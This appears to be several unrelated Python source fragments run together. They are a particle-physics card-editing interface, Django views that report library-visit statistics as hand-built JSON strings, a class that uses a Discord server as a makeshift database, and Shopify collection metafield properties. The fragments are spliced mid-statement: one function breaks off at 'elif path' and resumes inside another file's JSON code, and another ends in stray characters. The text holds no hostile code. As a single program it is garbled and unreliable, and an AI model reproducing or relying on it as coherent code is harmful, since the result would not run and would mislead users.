card = self.paths['param']
logger.info('running ASperGE')
returncode = misc.call([pjoin(path,'ASperGe'), card, '%s.new' % card] + opts)
if returncode:
logger.error('ASperGE fails with status %s' % returncode)
else:
logger.info('ASperGe created the file successfully')
files.mv(card, '%s.beforeasperge' % card)
files.mv('%s.new' % card, card)
self.reload_card(card)
def copy_file(self, path, pathname=None):
"""detect the type of the file and overwritte the current file"""
if not pathname:
pathname = path
if path.endswith('.lhco'):
#logger.info('copy %s as Events/input.lhco' % (path))
#files.cp(path, pjoin(self.mother_interface.me_dir, 'Events', 'input.lhco' ))
self.do_set('mw_run inputfile %s' % os.path.relpath(path, self.mother_interface.me_dir))
return
elif path.endswith('.lhco.gz'):
#logger.info('copy %s as Events/input.lhco.gz' % (path))
#files.cp(path, pjoin(self.mother_interface.me_dir, 'Events', 'input.lhco.gz' ))
self.do_set('mw_run inputfile %s' % os.path.relpath(path, self.mother_interface.me_dir))
return
else:
card_name = self.detect_card_type(path)
if card_name == 'unknown':
logger.warning('Failed to determine the type of the file. Not copied')
if card_name != 'banner':
logger.info('copy %s as %s' % (pathname, card_name))
files.cp(path, self.paths[card_name.rsplit('_',1)[0]])
self.reload_card(self.paths[card_name.rsplit('_',1)[0]])
elif card_name == 'banner':
banner_mod.split_banner(path, self.mother_interface.me_dir, proc_card=False)
logger.info('Splitting the banner into its components')
if not self.mode == 'auto':
self.mother_interface.keep_cards(self.cards)
for card_name in self.cards:
self.reload_card(pjoin(self.me_dir, 'Cards', card_name))
def detect_card_type(self, path):
"""detect card type"""
return CommonRunCmd.detect_card_type(path)
def open_file(self, answer):
"""open the file"""
try:
me_dir = self.mother_interface.me_dir
except:
me_dir = None
if answer.isdigit():
if answer == '9':
answer = 'plot'
else:
answer = self.cards[int(answer)-self.integer_bias]
if 'madweight' in answer:
answer = answer.replace('madweight', 'MadWeight')
elif 'MadLoopParams' in answer:
answer = self.paths['ML']
elif 'pythia8_card' in answer:
answer = self.paths['pythia8']
if os.path.exists(answer):
path = answer
else:
if not '.dat' in answer and not '.lhco' in answer:
if answer != 'trigger':
path = self.paths[answer]
else:
path = self.paths['delphes']
elif not '.lhco' in answer:
if '_' in answer:
path = self.paths['_'.join(answer.split('_')[:-1])]
else:
path = pjoin(me_dir, 'Cards', answer)
else:
path = pjoin(me_dir, self.mw_card['mw_run']['inputfile'])
if not os.path.exists(path):
logger.info('Path in MW_card not existing')
path = pjoin(me_dir, 'Events', answer)
#security
path = path.replace('_card_card','_card')
if answer in self.modified_card:
self.write_card(answer)
elif os.path.basename(answer.replace('_card.dat','')) in self.modified_card:
self.write_card(os.path.basename(answer.replace('_card.dat','')))
try:
self.mother_interface.exec_cmd('open %s' % path)
except InvalidCmd as error:
if str(error) != 'No default path for this file':
raise
if answer == 'transfer_card.dat':
logger.warning('You have to specify a transfer function first!')
elif answer == 'input.lhco':
path = pjoin(me_dir,'Events', 'input.lhco')
ff = open(path,'w')
ff.write('''No LHCO information imported at current time.
To import a lhco file: Close this file and type the path of your file.
You can also copy/paste, your event file here.''')
ff.close()
self.open_file(path)
else:
raise
self.reload_card(path)
def reload_card(self, path):
"""reload object to have it in sync"""
if path == self.paths['param']:
try:
self.param_card = param_card_mod.ParamCard(path)
except (param_card_mod.InvalidParamCard, ValueError) as e:
logger.error('Current param_card is not valid. We are going to use the default one.')
logger.error('problem detected: %s' % e)
logger.error('Please re-open the file and fix the problem.')
logger.warning('using the \'set\' command without opening the file will discard all your manual change')
elif path == self.paths['run']:
self.run_card = banner_mod.RunCard(path)
elif path == self.paths['shower']:
self.shower_card = shower_card_mod.ShowerCard(path)
elif path
% start_hour
jsonp += '"end_hour":"%s",' % end_hour
jsonp += '"dow":"%s",' % dow
jsonp += '"data":{"average":"%s"}' % average
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def averages(request, library, start, end, start_hour, end_hour, dow, filter_on):
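'''
Average number of visits per classification value of `filter_on` at `library`,
computed week by week over [start, end] within the start_hour-end_hour window
on day-of-week `dow`, and returned as streaming JSON.
'''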
dates = calculate_dates(start, end)
count = 0
totals = 0
classifications = get_classifications(filter_on)
jsonp = '{"data":{'
counts = []
for classification in classifications:
while (count <= dates['weeks']):
start_time = dates['start_date']+relativedelta(weeks=+count, hour=int(start_hour), weekday=int_day(int(dow)))
end_time = dates['start_date']+relativedelta(weeks=+count, hour=int(end_hour), weekday=int_day(int(dow)))
numbers = LibraryVisit.objects \
.values('visit_time') \
.annotate(total=Count('visit_time')) \
.filter(visit_time__range=[start_time, end_time])\
.filter(visit_time__week_day = dow) \
.filter(location = library) \
.filter(**{ filter_on: classification })
for number in numbers:
if number['visit_time'].hour != end_hour:
totals += number['total']
count += 1
average = totals / count
counts.append('"%s":{"label":"%s","value":%s}' % (slugify(classification), classification, average))
count = 0
totals = 0
jsonp += ', '.join(counts)
jsonp += '},'
jsonp += '"meta":{'
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"strt_hour":["%s"],' % start_hour
jsonp += '"end_hour":["%s"],' % end_hour
jsonp += '"dow":["%s"],' % alph_day(dow)
jsonp += '"queried_at":["%s"]' % datetime.now()
jsonp += '}}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def faculty_dprt_count(request, library, start, end):
'''
{
"data": {
"divs": {
"division-name-slug": {
"label": "Division Name",
"value": 10009,
"depts": {
"department-name-slug": {
"label": "Department Name",
"value": 9990
}
}
}
}
},
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Faculty Department"
}
}
'''
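# Minimal sketch (hypothetical client-side usage, not part of this view) of
# walking the structure documented above after parsing the response with
# json.loads:
#
#   payload = json.loads(response.content)
#   for div_slug, div in payload["data"]["divs"].items():
#       print(div["label"], div["value"])
#       for dept_slug, dept in div["depts"].items():
#           print("  ", dept["label"], dept["value"])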
def division_count(division, library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dvsn_n = division)
if count:
return count[0]['total']
else:
return 0
def department_count(department, library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dprt_n = department)
if count:
return count[0]['total']
else:
return 0
faculty_divisions = get_classifications('dvsn_n')
jsonp = '{"data":{"divs":{'
jsonp += '"'
faculty_divisions_list = (sorted(faculty_divisions.reverse()[1:]))
for faculty_division in faculty_divisions_list:
visit_count = division_count(faculty_division, library, start, end)
departments = get_classifications(faculty_division)
departments_list = (sorted(departments.reverse()[1:]))
last_departments = departments.reverse()[:1]
jsonp += '%s": {' % slugify(faculty_division)
jsonp += '"label": "%s",' % faculty_division
jsonp += '"value": "%s",' % visit_count
jsonp += '"depts":{'
for department in departments_list:
department_visit_count = department_count(department, library, start, end)
jsonp += '"%s":{' % slugify(department)
jsonp += '"label": "%s",' % department
jsonp += '"value": "%s"' % department_visit_count
jsonp += '},'
for last_department in last_departments:
last_department_visit_count = department_count(last_department, library, start, end)
jsonp += '"%s":{' % slugify(last_department)
jsonp += '"label": "%s",' % last_department
jsonp += '"value": "%s"' % last_department_visit_count
jsonp += '}'
jsonp += '}'
jsonp += '},"'
last_faculty_divisions = faculty_divisions.reverse()[:1]
for last_faculty_division in last_faculty_divisions:
last_division_count = division_count(last_faculty_division, library, start, end)
last_departments = get_classifications(last_faculty_division)
last_departments_list = sorted(last_departments.reverse()[1:])
final_departments = last_departments.reverse()[:1]
jsonp += '%s":{' % slugify(last_faculty_division)
jsonp += '"label": "%s",' % last_faculty_division
jsonp += '"value": "%s",' % last_division_count
jsonp += '"depts":{'
for final_department in last_departments_list:
final_department_visit_count = department_count(final_department, library, start, end)
jsonp += '"%s": {' % slugify(final_department)
jsonp += '"label": "%s",' % final_department
jsonp += '"value": "%s"' % final_department_visit_count
jsonp += '},'
for last_final_department in final_departments:
last_final_department_visit_count = department_count(last_final_department, library, start, end)
jsonp += '"%s": {' % slugify(last_final_department)
jsonp += '"label": "%s",' % last_final_department
jsonp += '"value": "%s"' % last_final_department_visit_count
jsonp += '}'
jsonp += '}'
jsonp += '}}}'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Faculty Department"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def faculty_divs_dprt(request, library, start, end):
'''
{
"data": {
"divs": [
{
"label": "Division Name",
"value": 10009,
"depts": [
[
"label": "Department Name",
"value": 9990
]
]
}
]
},
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Faculty Department"
}
}
'''
def division_totals(library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
if count:
return count
else:
return 0
def division_count(division, library, start, end):
count = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dvsn_n = division)
if count:
return count[0]['total']
else:
return 0
def department_totals(library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
if count:
return count
else:
return 0
def department_count(department, library, start, end):
count = LibraryVisit.objects.values('dprt_n') \
.annotate(total=Count('dprt_n')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(dprt_n = department)
if count:
return count[0]['total']
else:
return 0
jsonp = '{"data":{"divs":['
faculty_divisions_list = division_totals(library, start, end)
if (faculty_divisions_list):
for faculty_division in faculty_divisions_list:
faculty_division_name = faculty_division["dvsn_n"]
visit_count = faculty_division["total"]
departments_list = get_classifications(faculty_division_name)
print faculty_division_name
print departments_list
print '\n'
print '\n'
last_departments = departments_list.reverse()[:1]
jsonp += '{'
jsonp += '"label": "%s",' % faculty_division_name
jsonp += '"value": "%s",' % visit_count
jsonp += '"depts":['
for department in departments_list:
department_name = department
department_visit_count = department_count(department,library,start,end)
jsonp += '{'
jsonp += '"label": "%s",' % department_name
jsonp += '"value": "%s"' % department_visit_count
jsonp += '},'
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']},'
last_faculty_divisions = faculty_divisions_list.reverse()[:1]
for last_faculty_division in last_faculty_divisions:
#remove last comma
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']'
jsonp += '}'
else:
jsonp += ']'
jsonp += '}'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Faculty Department"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def academic_career_count(request, library, start, end):
'''
{
"data": [
{
"label": "School Name",
"value": 10009,
"data": [
[
epoch_timestamp,
value
]
]
}
],
"meta":{
"start_date": "YYYY-MM-DD",
"end_date": "YYYY-MM-DD",
"library": "library name",
"title": "Academic Career"
}
}
'''
def career_list(library, start, end):
record = LibraryVisit.objects \
.values('acca_i') \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(Q(prsn_c_type = 'B') | Q(prsn_c_type = 'S')) \
.annotate(total=Count('acca_i')) \
.order_by('-total')
return record
academic_careers = career_list(library, start, end)
jsonp = '{"data":['
academic_careers_list = academic_careers
for academic_career in academic_careers_list:
academic_career_name = academic_career["acca_i"]
visits =[]
visit_count = academic_career["total"]
numbers = LibraryVisit.objects.values('visit_time') \
.annotate(total=Count('visit_time')) \
.order_by('visit_time') \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.filter(acca_i = academic_career_name)
for number in numbers:
if number.has_key('visit_time'):
dt = datetime.strptime(str(number['visit_time']), '%Y-%m-%d %H:%M:%S')
epoch = int(time.mktime(dt.timetuple()))
# We have to add the three zeros to work with HighCharts
visits.append('[%s000,%s]' % (epoch, number['total']))
visits = ', '.join(visits)
jsonp += '{'
jsonp += '"label": "%s",' % academic_career_name
jsonp += '"value": "%s",' % visit_count
jsonp += '"data": [%s]' % visits
jsonp += '},'
if(jsonp[-1:] != '['):
jsonp = jsonp[:-1]
jsonp += ']'
jsonp += ',"meta":{'
jsonp += '"library":["%s"],' % library
jsonp += '"strt_date":["%s"],' % start
jsonp += '"end_date":["%s"],' % end
jsonp += '"title":["%s"]' % "Academic Career"
jsonp += '}'
jsonp += ',"queried_at": "%s"' % datetime.now()
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def percent_date(whole, part, label):
return '[%s: %s]' % (label, (100 * float(part)/float(whole)))
def percentage(request, library, start, end, filter_on):
'''
get total based on filter then iterate
'''
def classifications(request):
student_classes = get_classifications('stdn_e_clas')
academic_plans = get_classifications('acpl_n')
departments = get_classifications('dprt_n')
academic_career = get_classifications('acca_i')
faculty_divisions = get_classifications('dvsn_n')
jsonp = '{'
jsonp += '"student_classes":["'
jsonp += '","'.join(student_classes)
jsonp += '"],'
jsonp += '"academic_plans":["'
jsonp += '","'.join(academic_plans)
jsonp += '"],'
jsonp += '"academic_career":["'
jsonp += '","'.join(academic_career)
jsonp += '"],'
jsonp += '"faculty_divisions":["'
jsonp += '","'.join(faculty_divisions)
jsonp += '"],'
jsonp += '"departments":["'
jsonp += '","'.join(departments)
jsonp += '"]'
jsonp += '}'
return StreamingHttpResponse(jsonp, content_type='application/json')
def student_classifications(request):
student_classes = LibraryVisit.objects.values_list('stdn_e_clas', flat=True).distinct().exclude(stdn_e_clas__isnull=True)
data = []
jsonp = []
jsonp = '{'
jsonp += '"student_classes":["'
jsonp += '","'.join(student_classes)
jsonp += '"]'
jsonp += '}'
return HttpResponse(jsonp, content_type='application/json')
def classification_totals(request, library, person_type, start, end):
'''
Calculates totals based on specific classifications.
'''
student_classes = LibraryVisit.objects.values_list('stdn_e_clas', flat=True).distinct().exclude(stdn_e_clas__isnull=True)
def class_totals(location, person_type, start, end):
numbers =0
if person_type == 'all':
numbers = LibraryVisit.objects.values('prsn_e_type') \
.annotate(total=Count('prsn_e_type')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total')
elif person_type == 'student':
numbers = LibraryVisit.objects.values('acca_i') \
.annotate(total=Count('acca_i')) \
.filter(visit_time__range=[start, end]) \
.filter(location = library) \
.order_by('-total') \
.filter(Q(prsn_c_type = 'B') | Q(prsn_c_type = 'S'))
elif person_type == 'faculty':
numbers = LibraryVisit.objects.values('dvsn_n') \
.annotate(total=Count('dvsn_n'))
<gh_stars>1-10
import discord
import re
from enum import Enum
from datetime import datetime
# SDDB uses a Discord guild as a ghetto database and supports simple DB operations - create, select, update, delete.
# The │ character ASCII(0x2502) is used as a global delimiter, and is not allowed under any circumstances.
# A database is identified as a channel category in the Discord guild.
# - Databases can have multiple tables
# - Each Database has a master table that maps fields for each table in the database
# A table is identified as a text channel in the Discord guild.
# - Tables have columns as defined by its record in the master table, delimited by the 0x2502 character.
# A row is identified as a text message in a text channel in the Discord guild.
# - Row columns are delimited by the 0x2502 character.
# - Primary key is the message id.
# "from" is a Python keyword and cannot be used as a variable, "against" is used instead for SQL-like syntax.
class DBMS:
def __init__(self, discord_client, database_guild):
if not isinstance(discord_client, discord.Client):
raise TypeError("discord_client must be a discord.Client")
self.d = discord_client
self.db = None
self.ad = None # Active database pointer
if isinstance(database_guild, discord.Guild):
self.db = database_guild
elif isinstance(database_guild, int):
self.db = self.d.get_guild(database_guild)
if self.db is None:
raise Exception("guild does not exist: " + str(database_guild))
else:
raise TypeError("database_guild must be an int or guild object")
if not self.db.me.guild_permissions.administrator:
raise Warning("Warning: client does not have administrator permissions on database guild, CREATE and DROP operations may not be successful")
def use(self, name):
"""Changes the active database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed use; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
self.ad = d
return True
raise NameError("No database with name")
async def create_database(self, name):
"""Creates a database and sets it to the active database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed create; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
raise NameError("Database with name already exists")
overwrites = {
self.db.default_role: discord.PermissionOverwrite(read_messages=False),
self.db.me: discord.PermissionOverwrite(read_messages=True)
}
self.ad = await self.db.create_category(name, overwrites=overwrites ,reason="SDDB: New Database")
await self.db.create_text_channel(name, category=self.ad, reason="SDDB: New Database")
return True
async def drop_database(self, name):
"""Drops the database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed drop; illegal character")
for d in self.db.categories:
if d.name.lower() == name.lower():
for t in d.channels:
await t.delete(reason="SDDB: Drop Database")
await d.delete(reason="SDDB: Drop Database")
self.ad = None
return True
raise NameError("Database with name does not exist")
async def alter_database(self, name):
"""Alters the database"""
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed alter; illegal character")
if self.ad == None:
raise Exception("No active database")
for d in self.db.categories:
if d.name.lower() == name.lower():
raise NameError("Database with name already exists")
for d in self.db.categories:
if d.name.lower() == self.ad.name.lower():
master_table = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
raise NameError("Table exists with name, rename offending table and try again")
if t.name.lower() == self.ad.name.lower():
master_table = t
await master_table.edit(name=name, reason="SDDB: Alter Database")
await d.edit(name=name, reason="SDDB: Alter Database")
self.ad = d # update the database pointer as it may have changed
return True
async def create_table(self, name, **kwargs):
"""Creates a table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed create; illegal character")
if name.lower() == "master":
raise NameError("master is a reserved table name")
if self.ad.name.lower() == name.lower():
raise NameError("Table cannot have same name as parent database")
if len(self.ad.channels) == 1024:
raise Exception("Maximum number of tables reached; 1024")
table_header = ""
for field in kwargs:
if self.violates_str_rules(field) or self.violates_name_rules(field) or field == "" or " " in field:
raise TypeError("Malformed create; illegal character")
if self.violates_datatype_rules(kwargs[field]):
raise TypeError("Malformed create; illegal datatype")
table_header = table_header + str(field) + " " + str(kwargs[field]) + chr(0x2502)
mt = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
raise NameError("Table with name already exists")
if t.name.lower() == self.ad.name.lower():
mt = t
new_table = await self.db.create_text_channel(name, category=self.ad, reason="SDDB: New Table")
await mt.send(name + chr(0x2502) + table_header)
return True
async def drop_table(self, name):
"""Drops the table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name) or self.violates_name_rules(name) or " " in name:
raise TypeError("Malformed drop; illegal character")
if name.lower() == self.ad.name.lower():
raise NameError("Cannot drop table; illegal operation")
table = None
master_table = None
for t in self.ad.channels:
if t.name.lower() == name.lower():
table = t
if t.name.lower() == self.ad.name.lower():
master_table = t
if table == None:
raise NameError("Table with name does not exist")
for record in await master_table.history(limit=1024).flatten():
if record.content.split(chr(0x2502))[0].lower() == table.name.lower():
await record.delete()
break
await table.delete(reason="SDDB: Drop Table")
return True
async def alter_table(self, name, add="", drop="", modify="", rename=""):
"""Alters a table on the active database"""
if self.ad == None:
raise Exception("No active database")
if self.violates_str_rules(name, drop, rename) or self.violates_name_rules(name):
raise NameError("Malformed alter; illegal character")
if name.lower() == self.ad.name.lower():
raise NameError("Cannot alter master table")
successful = False
headers = None
table = None
header_row = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if name.lower() == record.content.split(chr(0x2502))[0].lower():
headers = self.build_table_headers(record)
del headers[0] # Don't track id here
header_row = record
break
if t.name.lower() == name.lower():
table = t
if table == None:
raise NameError("No table with name: " + name)
# add
if add != "":
new_col = add.split(" ", 1)
if self.violates_name_rules(new_col[0]):
raise NameError("Malformed alter; illegal character")
if self.violates_datatype_rules(new_col[1]):
raise TypeError("Malformed alter; illegal datatype")
await header_row.edit(content=header_row.content + new_col[0] + " " + new_col[1] + chr(0x2502))
for row in await table.history(limit=1024).flatten():
await row.edit(content=row.content + "" + chr(0x2502))
successful = True
# drop
if drop != "":
if self.violates_name_rules(drop):
raise NameError("Malformed alter; illegal character")
column_exists = False
for i in range(len(headers)):
if headers[i].column_name.lower() == drop.lower():
column_exists = True
fractured_header = header_row.content.split(chr(0x2502))
rebuilt_header = ""
for x in range(len(fractured_header)):
if x-1 != i:
rebuilt_header += fractured_header[x] + chr(0x2502)
await header_row.edit(content=rebuilt_header[:-1])
for row in await table.history(limit=1024).flatten():
fractured_row = row.content.split(chr(0x2502))
rebuilt_row = ""
for x in range(len(fractured_row)):
if x != i:
rebuilt_row += fractured_row[x] + chr(0x2502)
await row.edit(content=rebuilt_row[:-1])
successful = True
if not column_exists:
raise NameError("No column with name " + drop)
# modify
if modify != "":
if self.violates_name_rules(modify):
raise NameError("Malformed alter; illegal character")
mod_col = modify.split(" ", 2)
if self.violates_name_rules(mod_col[1]):
raise NameError("Malformed alter; illegal character")
if self.violates_datatype_rules(mod_col[2]):
raise TypeError("Malformed alter; illegal datatype")
header_exists = False
for header in headers:
if header.column_name.lower() == mod_col[0].lower():
header_exists = True
break
if header_exists:
fractured_header = header_row.content.split(mod_col[0], 1)
fractured_header[1] = chr(0x2502) + fractured_header[1].split(chr(0x2502), 1)[1]
await header_row.edit(content=fractured_header[0] + mod_col[1] + " " + mod_col[2] + fractured_header[1])
successful = True
else:
raise NameError("No column with name " + mod_col[0])
# rename
if rename != "":
if self.ad.name.lower() == rename.lower():
raise NameError("Table cannot have same name as parent database")
for t in self.ad.channels:
if t.name.lower() == rename.lower():
raise NameError("Table with name already exists")
new_headers = ""
for header in header_row.content.split(chr(0x2502)):
if header.lower() == name.lower():
header = rename
new_headers += header + chr(0x2502)
await header_row.edit(content=new_headers[:-1])
await table.edit(name=rename, reason="SDDB: Alter Table")
successful = True
if successful:
return True
return False
async def query(self, select="*", against="", where="", use=""):
"""Queries the active database"""
if self.ad == None and use == "":
raise Exception("No active database")
if not isinstance(select, str) or not isinstance(against, str) or not isinstance(use, str) or not isinstance(where, str):
raise TypeError("Malformed query; unexpected datatype, str only")
if self.violates_str_rules(select, against, where, use):
raise TypeError("Malformed query; illegal character")
if select == "":
raise NameError("Malformed query; invalid SELECT")
if against == "":
raise NameError("Malformed query; invalid AGAINST (FROM)")
adstore = self.change_ad_pointer(use)
headers = None
table = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if against.lower() == record.content.split(chr(0x2502))[0].lower():
headers = self.build_table_headers(record)
break
if t.name.lower() == against.lower():
table = t
if table == None:
if adstore is not None:
self.change_ad_pointer(adstore)
raise NameError("No table with name: " + against)
# validate select
selected_cols = []
if select != "*":
selectables = select.split(",")
for i in range(len(selectables)):
selectables[i] = selectables[i].strip()
selectables[i] = selectables[i].lower()
for i in range(len(headers)):
if headers[i].column_name.lower() in selectables:
selected_cols.append(i)
selectables.remove(headers[i].column_name.lower())
if len(selectables) > 0:
invalid_selected = ""
for s in selectables:
invalid_selected += " " + s
if adstore is not None:
self.change_ad_pointer(adstore)
raise Exception("Malformed query; selected columns not in table headers," + invalid_selected)
rawrows = await table.history(limit=1024).flatten()
full_table = Table(against, headers, rawrows)
match_table = Table(against, headers)
clauses = self.parse_where(where)
for row in full_table.rows:
for clause in clauses: # TODO: this will need to be changed to support and/or operators
if self.match_where(clause, row):
match_table.append(row)
# build the selected table
if len(selected_cols) != 0:
selected_headers = []
selected_rows = []
for i in selected_cols:
selected_headers.append(match_table.headers[i])
for row in match_table.rows:
selected_records = []
for i in range(len(row.records)):
if i in selected_cols:
selected_records.append(row.records[i])
selected_rows.append(TableRow(selected_headers, table_records=selected_records))
match_table = Table(against, selected_headers, table_rows=selected_rows)
# cleanup
if adstore is not None:
self.change_ad_pointer(adstore)
return match_table
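# Usage sketch (hypothetical; the WHERE syntax is whatever parse_where/match_where
# accept elsewhere in this class, so the clause below is an assumption):
#   result = await dbms.query(select="username, age", against="users", where="age = 21")
#   for row in result.rows:
#       print(row.records)
# The return value is a Table built from the channel history, reduced to the
# selected columns when an explicit SELECT list is given.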
async def insert_into(self, against, use="", **kwargs):
"""Insert a row into a table"""
if self.ad == None and use == "":
raise Exception("No active database")
if not isinstance(against, str) or not isinstance(use, str):
raise TypeError("Malformed insert; table or use must be a str")
if self.violates_str_rules(against) or self.violates_name_rules(against):
raise TypeError("Malformed insert; illegal character")
adstore = self.change_ad_pointer(use)
table = None
headers = None
for t in self.ad.channels:
if t.name.lower() == self.ad.name.lower():
mt_records = await t.history(limit=1024).flatten()
for record in mt_records:
if against.lower() == record.content.split(chr(0x2502))[0].lower():
headers = self.build_table_headers(record)
del headers[0] # Don't track id here
break
if t.name.lower() == against.lower():
table = t
if table == None:
if adstore is not None:
self.change_ad_pointer(adstore)
raise NameError("No table with name: " + against)
if len(kwargs) > len(headers):
if adstore is not None:
self.change_ad_pointer(adstore)
raise Exception("Number of columns exceeds table definition")
if len(await table.history(limit=1024).flatten()) == 1024:
if adstore | |
return getattr(self, field, '').strip()
@property
def custom_collection_family_metafield_value_value(self):
field = 'metafield_value_collection_family_custom_value'
value = getattr(self, field, '').strip()
if not value:
return None
return json.loads(value)
@property
def custom_collection_tag_names_value(self):
field = 'tag_names_collection_custom_value'
value = getattr(self, field, '').strip()
if not value:
return None
return json.loads(value)
@property
def metafields_dict_display_name_value(self):
choice_field = 'metafield_value_display_name_choice'
value = getattr(self, getattr(self, choice_field))
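# The *_choice field holds the *name* of another attribute on this calculator; the
# nested getattr first resolves that name, then reads the referenced attribute.
# The same indirection is used by the other *_choice-backed properties below.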
if not value:
return None
return [
{
'namespace': 'additional',
'key': 'display_name',
'owner_resource': ShopifyMetafield.COLLECTION_OWNER_RESOURCE,
'value': value,
'value_type': ShopifyMetafield.STRING_VALUE_TYPE
}
]
@property
def metafields_dict_collection_family_value(self):
choice_field = 'metafield_value_collection_family_choice'
values = getattr(self, getattr(self, choice_field))
if not values:
return None
return [
{
'namespace': 'additional',
'key': 'collection_family',
'owner_resource': ShopifyMetafield.COLLECTION_OWNER_RESOURCE,
'value': json.dumps(values),
'value_type': ShopifyMetafield.JSON_VALUE_TYPE
}
]
@property
def metafields_dict_custom_value(self):
attr = 'metafields_custom_value'
values = getattr(self, attr)
if not values:
return None
return sorted(
json.loads(values.strip()),
key=lambda k: k['value']
)
@property
def metafields_dict_all_value(self):
attrs = [
'metafields_dict_display_name_value',
'metafields_dict_collection_family_value',
'metafields_dict_custom_value'
]
metafields = []
for attr in attrs:
values = getattr(self, attr)
if values:
metafields += values
if not metafields:
return None
return sorted(metafields, key=lambda k: k['value'])
@property
def tags_dict_collection_value(self):
choice_field = 'tag_names_collection_choice'
values = getattr(self, getattr(self, choice_field))
if not values:
return None
return sorted(
[
{'name': tag_name}
for tag_name in values
],
key=lambda k: k['name']
)
@property
def tags_dict_custom_value(self):
attr = 'tags_custom_value'
values = getattr(self, attr)
if not values:
return None
return sorted(
json.loads(values.strip()),
key=lambda k: k['name']
)
@property
def tags_dict_all_value(self):
attrs = [
'tags_dict_collection_value',
'tags_dict_custom_value'
]
tags = []
for attr in attrs:
values = getattr(self, attr)
if values:
tags += values
if not tags:
return None
return sorted(tags, key=lambda k: k['name'])
# </editor-fold>
# <editor-fold desc="value preview properties ...">
@property
def sema_category_title_value_preview(self):
value_attr = 'sema_category_title_value'
return getattr(self, value_attr)
sema_category_title_value_preview.fget.short_description = (
'SEMA Category Title'
)
@property
def sema_category_chained_title_value_preview(self):
value_attr = 'sema_category_chained_title_value'
return getattr(self, value_attr)
sema_category_chained_title_value_preview.fget.short_description = (
'SEMA Category Chained Title'
)
@property
def sema_category_tag_names_value_preview(self):
value_attr = 'sema_category_tag_names_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
sema_category_tag_names_value_preview.fget.short_description = (
'SEMA Category Tag Names'
)
@property
def shopify_collection_collection_family_value_preview(self):
value_attr = 'shopify_collection_collection_family_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
shopify_collection_collection_family_value_preview.fget.short_description = (
'Shopify Collection Family'
)
@property
def metafields_dict_display_name_value_preview(self):
value_attr = 'metafields_dict_display_name_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_collection_family_value_preview(self):
value_attr = 'metafields_dict_collection_family_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_custom_value_preview(self):
value_attr = 'metafields_dict_custom_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def metafields_dict_all_value_preview(self):
value_attr = 'metafields_dict_all_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_collection_value_preview(self):
value_attr = 'tags_dict_collection_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_custom_value_preview(self):
value_attr = 'tags_dict_custom_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
@property
def tags_dict_all_value_preview(self):
value_attr = 'tags_dict_all_value'
values = getattr(self, value_attr, None)
if not values:
return None
return get_json_preview(json.dumps(values))
# </editor-fold>
